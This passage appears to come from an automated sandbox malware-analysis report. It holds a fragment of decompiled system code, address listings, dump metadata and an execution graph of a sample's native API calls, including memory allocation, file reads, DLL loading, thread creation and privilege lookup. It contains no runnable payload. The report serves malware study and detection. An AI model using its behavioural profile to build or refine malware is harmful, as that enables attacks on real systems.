                                              						goto L38;
                                              					}
                                              					_t71 = _t71 | 0xffffffff;
                                              					_t32 = 0;
                                              					asm("lock cmpxchg [edx], ecx");
                                              					__eflags = 0;
                                              					if(0 != 0) {
                                              						goto L4;
                                              					} else {
                                              						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                              						return 1;
                                              					}
                                              				}
                                              				L38:
                                              			}


























                                              0x008a53ab
                                              0x008a53ae
                                              0x008a53b1
                                              0x008a53b4
                                              0x008a53b7
                                              0x008c05b6
                                              0x008c05c0
                                              0x008c05c3
                                              0x00000000
                                              0x008c05c9
                                              0x008c05c9
                                              0x008c05cc
                                              0x008c05d5
                                              0x008c05d5
                                              0x008a53bd
                                              0x008a53bd
                                              0x008a53bd
                                              0x008a53be
                                              0x008a53be
                                              0x008a53be
                                              0x008a53c0
                                              0x00000000
                                              0x00000000
                                              0x008e2269
                                              0x008e226d
                                              0x008e2349
                                              0x008e234d
                                              0x008e2273
                                              0x008e2276
                                              0x008e2279
                                              0x008e227e
                                              0x008e2283
                                              0x008e2287
                                              0x008e228a
                                              0x008e228d
                                              0x008e228f
                                              0x008e22bc
                                              0x008e22bc
                                              0x008e22bc
                                              0x008e22be
                                              0x008e22c4
                                              0x008e22cc
                                              0x008e22d0
                                              0x008e22d6
                                              0x008e22d7
                                              0x008e22da
                                              0x008e22df
                                              0x008e22e4
                                              0x00000000
                                              0x00000000
                                              0x008e22e6
                                              0x008e22e9
                                              0x008e22f4
                                              0x008e22f9
                                              0x008e22fa
                                              0x008e2305
                                              0x008e2314
                                              0x008e2319
                                              0x008e231a
                                              0x008e231d
                                              0x008e2320
                                              0x008e2323
                                              0x008e2323
                                              0x008e2328
                                              0x008e232d
                                              0x008e232f
                                              0x008e2331
                                              0x008e2336
                                              0x008e2336
                                              0x008e233b
                                              0x008e233d
                                              0x008e2350
                                              0x008e2351
                                              0x008e2356
                                              0x008e2359
                                              0x008e2359
                                              0x008e235b
                                              0x008e235d
                                              0x008a5367
                                              0x008a536b
                                              0x008a5372
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e2363
                                              0x008e2363
                                              0x008e2369
                                              0x008e236a
                                              0x008e236c
                                              0x008e2371
                                              0x008e2373
                                              0x00000000
                                              0x008e2379
                                              0x008e2379
                                              0x008e237a
                                              0x008e237f
                                              0x008e237f
                                              0x008e2385
                                              0x008e2386
                                              0x008e2389
                                              0x008e238e
                                              0x008e2390
                                              0x008a5378
                                              0x008a537c
                                              0x008e2396
                                              0x008e2396
                                              0x008e2397
                                              0x008e239c
                                              0x008e23a2
                                              0x008e23a3
                                              0x008e23a6
                                              0x008e23ab
                                              0x008e23ad
                                              0x00000000
                                              0x008e23b3
                                              0x008e23b3
                                              0x008e23b4
                                              0x008e23b9
                                              0x008e23ba
                                              0x008e23ba
                                              0x008e23bc
                                              0x008e23bf
                                              0x00000000
                                              0x00000000
                                              0x008d9153
                                              0x008d9158
                                              0x008d915a
                                              0x008d915e
                                              0x008d9160
                                              0x00000000
                                              0x008d9166
                                              0x008d9166
                                              0x008d9171
                                              0x008d9176
                                              0x008d9176
                                              0x00000000
                                              0x008d9160
                                              0x008e23c6
                                              0x008e23cb
                                              0x008e23ce
                                              0x008e23d7
                                              0x008e23d7
                                              0x008e23ad
                                              0x008e2390
                                              0x008e2373
                                              0x008e233f
                                              0x008e233f
                                              0x00000000
                                              0x008e233f
                                              0x008e2291
                                              0x008e2291
                                              0x008e2293
                                              0x008e2295
                                              0x008e229a
                                              0x008e22a1
                                              0x008e22a3
                                              0x008e22a7
                                              0x008e22a9
                                              0x00000000
                                              0x00000000
                                              0x008e22ab
                                              0x008e22ad
                                              0x008e22af
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e22af
                                              0x008e22b1
                                              0x008e22b4
                                              0x008e22b4
                                              0x008e22b6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x008e22b6
                                              0x008e228f
                                              0x00000000
                                              0x008e226d
                                              0x008a53cb
                                              0x008a53ce
                                              0x008a53d0
                                              0x008a53d4
                                              0x008a53d6
                                              0x00000000
                                              0x008a53d8
                                              0x008a53e3
                                              0x008a53ea
                                              0x008a53ea
                                              0x008a53d6
                                              0x00000000

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E22F4
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 008E2328
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
                                              • RTL: Resource at %p, xrefs: 008E230B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-871070163
                                              • Opcode ID: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                              • Instruction ID: 2ca0ade7d821966cbdedf6cd2ddefee1e062d6349907fe140793985e9ff74962
                                              • Opcode Fuzzy Hash: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                              • Instruction Fuzzy Hash: 1F5128716006056BEF11DB29CC81FA673ACFF96360F104229FD18DB781EA71EC818BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:3.2%
                                              Signature Coverage:1.3%
                                              Total number of Nodes:758
                                              Total number of Limit Nodes:98
                                              execution_graph 48688 cb109 LdrInitializeThunk 48622 c5003 CreateProcessInternalW 48600 c821b 32 API calls 48631 d9029 LdrLoadDll Sleep NtAllocateVirtualMemory 48632 25d9879 8 API calls ___swprintf_l 48635 cc00a NtClose 48603 d9030 48604 dbe70 NtAllocateVirtualMemory 48603->48604 48606 d906b 48604->48606 48605 d914c 48606->48605 48607 ca140 LdrLoadDll 48606->48607 48609 d90a1 48607->48609 48608 d90d0 Sleep 48608->48609 48609->48605 48609->48608 48641 25da41e 16 API calls 48643 d124a 10 API calls 48591 db144 9 API calls 48708 c6107 7 API calls 48710 25ce70f 8 API calls 48711 2606334 10 API calls 48647 cd25a RtlAllocateHeap RtlFreeHeap 48610 c9151 13 API calls 48715 d9153 CreateThread 48658 d4262 LdrLoadDll RtlFreeHeap 48662 25ea421 9 API calls ___swprintf_l 47730 df28d 47733 dba60 47730->47733 47732 df292 47734 dba86 47733->47734 47739 c9160 47734->47739 47736 dba92 47737 dbab9 47736->47737 47745 c8440 47736->47745 47737->47732 47765 c90b0 47739->47765 47741 c9174 47741->47736 47742 c916d 47742->47741 47772 cd570 47742->47772 47751 c8467 47745->47751 47746 c85e4 47746->47737 47748 c8506 47748->47746 47749 dc0c0 RtlAllocateHeap 47748->47749 47750 c851c 47749->47750 47752 dc0c0 RtlAllocateHeap 47750->47752 47751->47746 48008 cd770 47751->48008 47753 c852d 47752->47753 47754 dc0c0 RtlAllocateHeap 47753->47754 47755 c853e 47754->47755 47756 d56a0 7 API calls 47755->47756 47757 c8562 47756->47757 47758 d56a0 7 API calls 47757->47758 47760 c8573 47758->47760 47759 d56a0 7 API calls 47763 c85aa 47759->47763 47760->47759 47761 c85db 47760->47761 48018 c8220 47761->48018 47763->47761 48035 cc0e0 NtClose LdrInitializeThunk LdrInitializeThunk 47763->48035 47767 c90c3 47765->47767 47766 c90d6 47766->47742 47767->47766 47780 db310 47767->47780 47769 c9113 47769->47766 47791 c8ed0 47769->47791 47771 c9133 47771->47742 47774 cd589 47772->47774 47773 c9185 47773->47736 47774->47773 48000 da780 47774->48000 47776 cd5c2 47777 cd5ed 47776->47777 48003 da210 47776->48003 47778 da440 NtClose 47777->47778 47778->47773 47781 db329 47780->47781 47797 d56a0 47781->47797 47783 db341 47784 db34a 47783->47784 47822 db150 47783->47822 47784->47769 47786 db35e 47786->47784 47835 d9eb0 47786->47835 47979 c7210 47791->47979 47793 c8ef1 47793->47771 47794 c8eea 47794->47793 47992 c74d0 47794->47992 47798 d56b4 47797->47798 47803 d57c3 47797->47803 47798->47803 47842 da310 47798->47842 47800 d5807 47801 dbef0 RtlFreeHeap 47800->47801 47806 d5813 47801->47806 47802 d5999 47804 da440 NtClose 47802->47804 47803->47783 47805 d59a0 47804->47805 47805->47783 47806->47802 47806->47803 47807 d5909 47806->47807 47808 d58b1 47806->47808 47807->47802 47814 d591c 47807->47814 47809 d58ca 47808->47809 47810 d58b6 47808->47810 47812 d58cf 47809->47812 47813 d58e7 47809->47813 47887 d52a0 NtClose LdrInitializeThunk LdrInitializeThunk 47810->47887 47845 d5340 47812->47845 47813->47805 47855 d5060 47813->47855 47888 da440 47814->47888 47815 d58c0 47815->47783 47817 d58dd 47817->47783 47820 d58ff 47820->47783 47821 d5988 47821->47783 47824 db16b 47822->47824 47823 db17d 47823->47786 47824->47823 47906 dbe70 47824->47906 47826 db19d 47909 d4cc0 47826->47909 47828 db1c0 47828->47823 47829 d4cc0 2 API calls 47828->47829 47831 db1e2 47829->47831 47831->47823 47941 d5fe0 47831->47941 47832 db26a 47952 d9e70 47832->47952 47836 d9ecc 47835->47836 47975 25bfae8 LdrInitializeThunk 47836->47975 47837 d9ee7 47839 dbef0 47837->47839 47976 da620 47839->47976 47841 db3b9 47841->47769 47843 daf60 47842->47843 47844 da32c NtCreateFile 47843->47844 47844->47800 47846 d535c 47845->47846 47847 d5398 47846->47847 47848 d5384 47846->47848 47850 da440 NtClose 47847->47850 47849 da440 NtClose 47848->47849 47851 d538d 47849->47851 47852 d53a1 47850->47852 47851->47817 47891 dc100 RtlAllocateHeap 47852->47891 47854 d53ac 47854->47817 47856 d50ab 47855->47856 47857 d50de 47855->47857 47859 da440 NtClose 47856->47859 47858 d50fa 47857->47858 47860 d5229 47857->47860 47862 d511c 47858->47862 47863 d5131 47858->47863 47861 d50cf 47859->47861 47869 da440 NtClose 47860->47869 47861->47820 47866 da440 NtClose 47862->47866 47864 d514c 47863->47864 47865 d5136 47863->47865 47875 d5151 47864->47875 47892 dc0c0 47864->47892 47868 da440 NtClose 47865->47868 47867 d5125 47866->47867 47867->47820 47871 d513f 47868->47871 47870 d5289 47869->47870 47870->47820 47871->47820 47874 d51b7 47876 d51ea 47874->47876 47877 d51d5 47874->47877 47880 d5163 47875->47880 47895 da3c0 47875->47895 47879 da440 NtClose 47876->47879 47878 da440 NtClose 47877->47878 47878->47880 47881 d51f3 47879->47881 47880->47820 47882 d521f 47881->47882 47898 dbcc0 47881->47898 47882->47820 47884 d520a 47885 dbef0 RtlFreeHeap 47884->47885 47886 d5213 47885->47886 47886->47820 47887->47815 47889 daf60 47888->47889 47890 da45c NtClose 47889->47890 47890->47821 47891->47854 47903 da5e0 47892->47903 47894 dc0d8 47894->47875 47896 daf60 47895->47896 47897 da3dc NtReadFile 47896->47897 47897->47874 47899 dbccd 47898->47899 47900 dbce4 47898->47900 47899->47900 47901 dc0c0 RtlAllocateHeap 47899->47901 47900->47884 47902 dbcfb 47901->47902 47902->47884 47904 daf60 47903->47904 47905 da5fc RtlAllocateHeap 47904->47905 47905->47894 47956 da4f0 47906->47956 47908 dbe9d 47908->47826 47910 d4cd9 47909->47910 47911 d4cd1 47909->47911 47940 d4fac 47910->47940 47959 dd0a0 47910->47959 47911->47828 47913 d4d2d 47914 dd0a0 RtlAllocateHeap 47913->47914 47918 d4d38 47914->47918 47915 d4d86 47917 dd0a0 RtlAllocateHeap 47915->47917 47921 d4d9a 47917->47921 47918->47915 47919 dd1d0 2 API calls 47918->47919 47973 dd140 RtlAllocateHeap RtlFreeHeap 47918->47973 47919->47918 47920 d4df7 47922 dd0a0 RtlAllocateHeap 47920->47922 47921->47920 47964 dd1d0 47921->47964 47923 d4e0d 47922->47923 47925 d4e4a 47923->47925 47927 dd1d0 2 API calls 47923->47927 47926 dd0a0 RtlAllocateHeap 47925->47926 47928 d4e55 47926->47928 47927->47923 47929 dd1d0 2 API calls 47928->47929 47936 d4e8f 47928->47936 47929->47928 47932 dd100 RtlFreeHeap 47933 d4f8e 47932->47933 47934 dd100 RtlFreeHeap 47933->47934 47935 d4f98 47934->47935 47937 dd100 RtlFreeHeap 47935->47937 47970 dd100 47936->47970 47938 d4fa2 47937->47938 47939 dd100 RtlFreeHeap 47938->47939 47939->47940 47940->47828 47942 d5ff1 47941->47942 47943 d56a0 7 API calls 47942->47943 47947 d6007 47943->47947 47944 d6010 47944->47832 47945 d6047 47946 dbef0 RtlFreeHeap 47945->47946 47948 d6058 47946->47948 47947->47944 47947->47945 47949 d6093 47947->47949 47948->47832 47950 dbef0 RtlFreeHeap 47949->47950 47951 d6098 47950->47951 47951->47832 47953 d9e8c 47952->47953 47974 25bfdc0 LdrInitializeThunk 47953->47974 47954 d9ea3 47954->47786 47957 daf60 47956->47957 47958 da50c NtAllocateVirtualMemory 47957->47958 47958->47908 47960 dd0b6 47959->47960 47961 dd0b0 47959->47961 47962 dc0c0 RtlAllocateHeap 47960->47962 47961->47913 47963 dd0dc 47962->47963 47963->47913 47965 dd140 47964->47965 47966 dc0c0 RtlAllocateHeap 47965->47966 47967 dd19d 47965->47967 47968 dd17a 47966->47968 47967->47921 47969 dbef0 RtlFreeHeap 47968->47969 47969->47967 47971 d4f84 47970->47971 47972 dbef0 RtlFreeHeap 47970->47972 47971->47932 47972->47971 47973->47918 47974->47954 47975->47837 47977 daf60 47976->47977 47978 da63c RtlFreeHeap 47977->47978 47978->47841 47980 c721b 47979->47980 47981 c7220 47979->47981 47980->47794 47982 dbe70 NtAllocateVirtualMemory 47981->47982 47988 c7245 47982->47988 47983 c72a8 47983->47794 47984 d9e70 LdrInitializeThunk 47984->47988 47985 c72ae 47987 c72d4 47985->47987 47989 da570 LdrInitializeThunk 47985->47989 47987->47794 47988->47983 47988->47984 47988->47985 47990 dbe70 NtAllocateVirtualMemory 47988->47990 47995 da570 47988->47995 47991 c72c5 47989->47991 47990->47988 47991->47794 47993 da570 LdrInitializeThunk 47992->47993 47994 c74ee 47993->47994 47994->47771 47996 da58c 47995->47996 47999 25bfb68 LdrInitializeThunk 47996->47999 47997 da5a3 47997->47988 47999->47997 48001 daf60 48000->48001 48002 da79f LookupPrivilegeValueW 48001->48002 48002->47776 48004 da22c 48003->48004 48007 25bfed0 LdrInitializeThunk 48004->48007 48005 da24b 48005->47777 48007->48005 48009 cd79c 48008->48009 48036 cd680 48009->48036 48012 cd7c9 48014 cd7d4 48012->48014 48016 da440 NtClose 48012->48016 48013 cd7e1 48015 cd7f2 48013->48015 48017 da440 NtClose 48013->48017 48014->47748 48015->47748 48016->48014 48017->48015 48047 cda30 48018->48047 48020 c8233 48031 c8431 48020->48031 48051 d4ff0 48020->48051 48022 c8292 48022->48031 48054 c7fd0 48022->48054 48025 dd0a0 RtlAllocateHeap 48026 c82d9 48025->48026 48027 dd1d0 2 API calls 48026->48027 48034 c82ee 48027->48034 48028 c7210 3 API calls 48028->48034 48031->47746 48033 c74d0 LdrInitializeThunk 48033->48034 48034->48028 48034->48031 48034->48033 48059 cb200 48034->48059 48101 cd9d0 48034->48101 48105 cd4b0 48034->48105 48035->47761 48037 cd750 48036->48037 48038 cd69a 48036->48038 48037->48012 48037->48013 48042 d9f30 48038->48042 48041 da440 NtClose 48041->48037 48043 d9f4c 48042->48043 48046 25c07ac LdrInitializeThunk 48043->48046 48044 cd744 48044->48041 48046->48044 48048 cda4f 48047->48048 48049 cda5d 48048->48049 48050 cda56 SetErrorMode 48048->48050 48049->48020 48050->48049 48117 cd800 48051->48117 48053 d5016 48053->48022 48055 dbe70 NtAllocateVirtualMemory 48054->48055 48058 c7ff5 48055->48058 48056 c8210 48056->48025 48058->48056 48134 d9830 48058->48134 48060 cb219 48059->48060 48061 cb21f 48059->48061 48175 cd2c0 48060->48175 48184 c8c20 48061->48184 48064 cb22c 48065 dd1d0 2 API calls 48064->48065 48100 cb4c2 48064->48100 48066 cb248 48065->48066 48067 cd9d0 LdrInitializeThunk 48066->48067 48068 cb25c 48066->48068 48067->48068 48069 cb390 48068->48069 48070 d9eb0 LdrInitializeThunk 48068->48070 48068->48100 48201 cb1a0 48069->48201 48071 cb2da 48070->48071 48071->48069 48075 cb2e6 48071->48075 48074 cb3b7 48076 da440 NtClose 48074->48076 48078 cb339 48075->48078 48082 d9fc0 LdrInitializeThunk 48075->48082 48075->48100 48079 cb3c1 48076->48079 48081 da440 NtClose 48078->48081 48079->48034 48080 cb3d9 48080->48074 48083 cb3e0 48080->48083 48085 cb356 48081->48085 48082->48078 48084 cb3f8 48083->48084 48207 cb090 48083->48207 48210 caf10 48084->48210 48190 d92e0 48085->48190 48088 cb36d 48088->48100 48193 c7680 48088->48193 48094 cb430 48230 d9dd0 48094->48230 48095 da440 NtClose 48096 cb495 48095->48096 48097 da440 NtClose 48096->48097 48098 cb49f 48097->48098 48099 c7680 3 API calls 48098->48099 48098->48100 48099->48100 48100->48034 48102 cd9e3 48101->48102 48287 d9e40 48102->48287 48106 cd4f8 48105->48106 48110 cd4c0 48105->48110 48107 cd513 48106->48107 48113 cd548 48106->48113 48318 cd260 RtlAllocateHeap RtlFreeHeap 48106->48318 48312 cd1e0 48107->48312 48110->48106 48292 cd310 48110->48292 48113->48034 48115 cd52b 48115->48113 48116 d56a0 7 API calls 48115->48116 48116->48113 48118 cd81d 48117->48118 48124 d9f70 48118->48124 48121 cd865 48121->48053 48125 d9f8c 48124->48125 48132 25bffb4 LdrInitializeThunk 48125->48132 48126 cd85e 48126->48121 48128 d9fc0 48126->48128 48129 d9fdc 48128->48129 48133 25bfc60 LdrInitializeThunk 48129->48133 48130 cd88e 48130->48053 48132->48126 48133->48130 48135 dc0c0 RtlAllocateHeap 48134->48135 48136 d9847 48135->48136 48153 c8760 48136->48153 48138 d9862 48139 d9889 48138->48139 48140 d98a0 48138->48140 48141 dbef0 RtlFreeHeap 48139->48141 48143 dbe70 NtAllocateVirtualMemory 48140->48143 48142 d9896 48141->48142 48142->48056 48144 d98da 48143->48144 48145 dbe70 NtAllocateVirtualMemory 48144->48145 48146 d98f3 48145->48146 48147 d9b80 48146->48147 48150 d9b94 48146->48150 48148 dbef0 RtlFreeHeap 48147->48148 48149 d9b8a 48148->48149 48149->48056 48151 dbef0 RtlFreeHeap 48150->48151 48152 d9be9 48151->48152 48152->48056 48154 c8785 48153->48154 48159 ca140 48154->48159 48158 c87dd 48158->48138 48160 ca164 48159->48160 48161 c87b8 48160->48161 48162 ca1a0 LdrLoadDll 48160->48162 48161->48158 48163 cb940 48161->48163 48162->48161 48164 cb96c 48163->48164 48165 cb98c 48164->48165 48170 da1d0 48164->48170 48165->48158 48167 cb9af 48167->48165 48168 da440 NtClose 48167->48168 48169 cb9ea 48168->48169 48169->48158 48171 da1ec 48170->48171 48174 25bfbb8 LdrInitializeThunk 48171->48174 48172 da207 48172->48167 48174->48172 48176 cd2d7 48175->48176 48234 cc3b0 48175->48234 48178 cd2f0 48176->48178 48241 c4000 48176->48241 48179 dc0c0 RtlAllocateHeap 48178->48179 48181 cd2fe 48179->48181 48181->48061 48182 cd2ea 48257 d9160 48182->48257 48185 c8c3b 48184->48185 48186 cd680 2 API calls 48185->48186 48189 c8d51 48185->48189 48187 c8d3c 48186->48187 48188 da440 NtClose 48187->48188 48187->48189 48188->48189 48189->48064 48191 cd9d0 LdrInitializeThunk 48190->48191 48192 d9312 48191->48192 48192->48088 48194 c7698 48193->48194 48195 ca140 LdrLoadDll 48194->48195 48196 c76b3 48195->48196 48197 c76cc PostThreadMessageW 48196->48197 48198 c76fd 48196->48198 48197->48198 48199 c76e0 48197->48199 48198->48034 48200 c76ea PostThreadMessageW 48199->48200 48200->48198 48202 cb1d6 48201->48202 48203 d9eb0 LdrInitializeThunk 48201->48203 48276 da4b0 48202->48276 48203->48202 48206 cb110 LdrInitializeThunk 48206->48080 48208 d9fc0 LdrInitializeThunk 48207->48208 48209 cb0ce 48208->48209 48209->48084 48212 caf3b 48210->48212 48211 cd800 2 API calls 48213 caf9a 48211->48213 48212->48211 48214 d9fc0 LdrInitializeThunk 48213->48214 48223 cafe3 48213->48223 48215 cafc5 48214->48215 48216 cafcc 48215->48216 48219 cafef 48215->48219 48217 da010 LdrInitializeThunk 48216->48217 48218 cafd9 48217->48218 48220 da440 NtClose 48218->48220 48221 cb059 48219->48221 48222 cb039 48219->48222 48220->48223 48281 da010 48221->48281 48224 da440 NtClose 48222->48224 48223->48094 48226 cb046 48224->48226 48226->48094 48228 da440 NtClose 48229 cb075 48228->48229 48229->48094 48231 d9dec 48230->48231 48286 25c0078 LdrInitializeThunk 48231->48286 48232 cb48b 48232->48095 48235 cc3e3 48234->48235 48236 cd800 2 API calls 48235->48236 48237 cc44d 48236->48237 48238 cc454 48237->48238 48261 dc100 RtlAllocateHeap 48237->48261 48238->48176 48240 cc464 48240->48176 48242 c402c 48241->48242 48243 cb940 2 API calls 48242->48243 48244 c4103 48243->48244 48256 c44ff 48244->48256 48262 cba00 48244->48262 48248 c43b3 48249 c4479 48248->48249 48250 cba00 LdrInitializeThunk 48248->48250 48252 dbe70 NtAllocateVirtualMemory 48249->48252 48251 c4452 48250->48251 48251->48249 48254 da0d0 LdrInitializeThunk 48251->48254 48253 c44e6 48252->48253 48255 dbe70 NtAllocateVirtualMemory 48253->48255 48254->48249 48255->48256 48256->48182 48258 d9181 48257->48258 48259 d91a7 48258->48259 48260 d9194 CreateThread 48258->48260 48259->48178 48260->48178 48261->48240 48263 cba25 48262->48263 48270 da040 48263->48270 48266 da0d0 48267 da0ec 48266->48267 48275 25bfab8 LdrInitializeThunk 48267->48275 48268 da10b 48268->48248 48271 da05c 48270->48271 48274 25bfb50 LdrInitializeThunk 48271->48274 48272 c438c 48272->48248 48272->48266 48274->48272 48275->48268 48277 da4cc 48276->48277 48280 25bfea0 LdrInitializeThunk 48277->48280 48278 cb1eb 48278->48074 48278->48206 48280->48278 48282 da02c 48281->48282 48285 25bfc90 LdrInitializeThunk 48282->48285 48283 cb06b 48283->48228 48285->48283 48286->48232 48288 d9e5c 48287->48288 48291 25bfd8c LdrInitializeThunk 48288->48291 48289 cda0e 48289->48034 48291->48289 48293 cd340 48292->48293 48320 d49c0 48293->48320 48295 cd381 48341 d36b0 48295->48341 48297 cd387 48370 d08d0 48297->48370 48299 cd38d 48381 d27a0 48299->48381 48301 cd395 48401 d39d0 48301->48401 48305 cd3a1 48429 d4040 48305->48429 48307 cd3a7 48435 cf110 48307->48435 48309 cd3bf 48443 cf2e0 48309->48443 48313 cd249 48312->48313 48314 cd1f8 48312->48314 48313->48113 48319 cd020 7 API calls 48313->48319 48314->48313 48315 cf6c0 7 API calls 48314->48315 48316 cd233 48315->48316 48316->48313 48536 cf910 48316->48536 48318->48107 48319->48115 48321 d49e8 48320->48321 48322 cb940 2 API calls 48321->48322 48324 d4a4a 48322->48324 48323 d4a51 48323->48295 48324->48323 48325 cba00 LdrInitializeThunk 48324->48325 48326 d4ac1 48325->48326 48328 d4ada 48326->48328 48453 d4320 48326->48453 48329 cba00 LdrInitializeThunk 48328->48329 48339 d4c7f 48328->48339 48330 d4b47 48329->48330 48332 d4320 7 API calls 48330->48332 48334 d4b64 48330->48334 48331 cba00 LdrInitializeThunk 48333 d4bbd 48331->48333 48332->48334 48335 d4320 7 API calls 48333->48335 48337 d4bda 48333->48337 48334->48331 48334->48339 48335->48337 48336 cba00 LdrInitializeThunk 48338 d4c62 48336->48338 48337->48336 48337->48339 48338->48339 48340 d4320 7 API calls 48338->48340 48339->48295 48340->48339 48342 d3714 48341->48342 48343 cb940 2 API calls 48342->48343 48345 d3814 48343->48345 48344 d381b 48344->48297 48345->48344 48346 cba00 LdrInitializeThunk 48345->48346 48347 d3883 48346->48347 48348 d39a3 48347->48348 48349 d4320 7 API calls 48347->48349 48348->48297 48350 d38a0 48349->48350 48351 d39b2 48350->48351 48354 d38c3 48350->48354 48352 da440 NtClose 48351->48352 48353 d39bc 48352->48353 48353->48297 48355 dc0c0 RtlAllocateHeap 48354->48355 48356 d38ec 48355->48356 48357 d390b 48356->48357 48358 d38f5 48356->48358 48457 d33c0 CoInitialize CoCreateInstance 48357->48457 48359 da440 NtClose 48358->48359 48361 d38ff 48359->48361 48361->48297 48362 d3919 48460 da150 48362->48460 48364 d3992 48365 da440 NtClose 48364->48365 48366 d399c 48365->48366 48367 dbef0 RtlFreeHeap 48366->48367 48367->48348 48368 d3937 48368->48364 48369 da150 LdrInitializeThunk 48368->48369 48369->48368 48371 d08f8 48370->48371 48372 dc0c0 RtlAllocateHeap 48371->48372 48374 d0958 48372->48374 48373 d0961 48373->48299 48374->48373 48465 d0590 48374->48465 48376 d0988 48377 d0590 10 API calls 48376->48377 48378 d09eb 48377->48378 48379 dbef0 RtlFreeHeap 48378->48379 48380 d0a2e 48379->48380 48380->48299 48382 d27c6 48381->48382 48383 d285e 48382->48383 48389 d27d8 48382->48389 48384 d283c 48383->48384 48504 d39f0 48383->48504 48387 d2856 48384->48387 48508 d8890 48384->48508 48387->48301 48388 d28f0 48388->48301 48392 d56a0 7 API calls 48389->48392 48390 d289b 48390->48388 48391 d28ba 48390->48391 48400 d28fc 48390->48400 48393 d28df 48391->48393 48394 d28c2 48391->48394 48392->48384 48396 dbef0 RtlFreeHeap 48393->48396 48395 dbef0 RtlFreeHeap 48394->48395 48397 d28d3 48395->48397 48396->48388 48397->48301 48398 dbef0 RtlFreeHeap 48399 d2a16 48398->48399 48399->48301 48400->48398 48402 d27a0 8 API calls 48401->48402 48403 cd39b 48402->48403 48404 d1790 48403->48404 48405 d17b2 48404->48405 48517 d1660 48405->48517 48408 d1660 3 API calls 48409 d1a1b 48408->48409 48410 d1660 3 API calls 48409->48410 48411 d1a33 48410->48411 48412 d1660 3 API calls 48411->48412 48413 d1a4b 48412->48413 48414 d1660 3 API calls 48413->48414 48415 d1a63 48414->48415 48416 d1660 3 API calls 48415->48416 48418 d1a7e 48416->48418 48417 d1a98 48417->48305 48418->48417 48419 d1660 3 API calls 48418->48419 48420 d1acc 48419->48420 48421 d1660 3 API calls 48420->48421 48422 d1b09 48421->48422 48423 d1660 3 API calls 48422->48423 48424 d1b46 48423->48424 48425 d1660 3 API calls 48424->48425 48426 d1b83 48425->48426 48427 d1660 3 API calls 48426->48427 48428 d1bc0 48427->48428 48428->48305 48430 d405d 48429->48430 48431 ca140 LdrLoadDll 48430->48431 48432 d4078 48431->48432 48433 d4320 7 API calls 48432->48433 48434 d41c1 48432->48434 48433->48434 48434->48307 48436 cf120 48435->48436 48439 cf12b 48435->48439 48437 dc0c0 RtlAllocateHeap 48436->48437 48437->48439 48524 cdc20 48439->48524 48440 cf141 48440->48309 48441 cf13a 48441->48440 48442 dbef0 RtlFreeHeap 48441->48442 48442->48440 48445 cf343 48443->48445 48444 cf3a4 48447 d39f0 7 API calls 48444->48447 48445->48444 48528 cf190 48445->48528 48448 cf3c7 48447->48448 48449 cf190 7 API calls 48448->48449 48450 cf405 48448->48450 48449->48450 48451 cf190 7 API calls 48450->48451 48452 cd3d1 48451->48452 48452->48106 48454 d439d 48453->48454 48455 d56a0 7 API calls 48454->48455 48456 d4519 48454->48456 48455->48456 48456->48328 48458 d34bb OleUninitialize 48457->48458 48459 d342d 48457->48459 48458->48362 48459->48458 48461 da16c 48460->48461 48464 25bfa50 LdrInitializeThunk 48461->48464 48462 da18b 48462->48368 48464->48462 48466 d0628 48465->48466 48467 cba00 LdrInitializeThunk 48466->48467 48468 d0706 48467->48468 48469 d087e 48468->48469 48470 da0d0 LdrInitializeThunk 48468->48470 48490 d0836 48469->48490 48498 cf6c0 48469->48498 48472 d0731 48470->48472 48473 d0874 48472->48473 48475 d073c 48472->48475 48474 da440 NtClose 48473->48474 48474->48469 48476 da440 NtClose 48475->48476 48477 d077f 48476->48477 48478 d07bf 48477->48478 48479 cba00 LdrInitializeThunk 48477->48479 48478->48376 48480 d07e3 48479->48480 48481 da0d0 LdrInitializeThunk 48480->48481 48480->48490 48482 d0808 48481->48482 48483 d080f 48482->48483 48484 d085b 48482->48484 48485 da440 NtClose 48483->48485 48486 da440 NtClose 48484->48486 48487 d0819 48485->48487 48488 d0865 48486->48488 48491 cfd00 48487->48491 48488->48376 48490->48376 48493 cfd25 48491->48493 48492 cfd8e 48492->48490 48493->48492 48494 ca140 LdrLoadDll 48493->48494 48496 cfe0c 48494->48496 48495 cfe18 48495->48490 48496->48495 48497 ca140 LdrLoadDll 48496->48497 48497->48495 48499 cf6e5 48498->48499 48500 d56a0 7 API calls 48499->48500 48502 cf817 48500->48502 48501 cf8d1 48501->48490 48502->48501 48503 d56a0 7 API calls 48502->48503 48503->48501 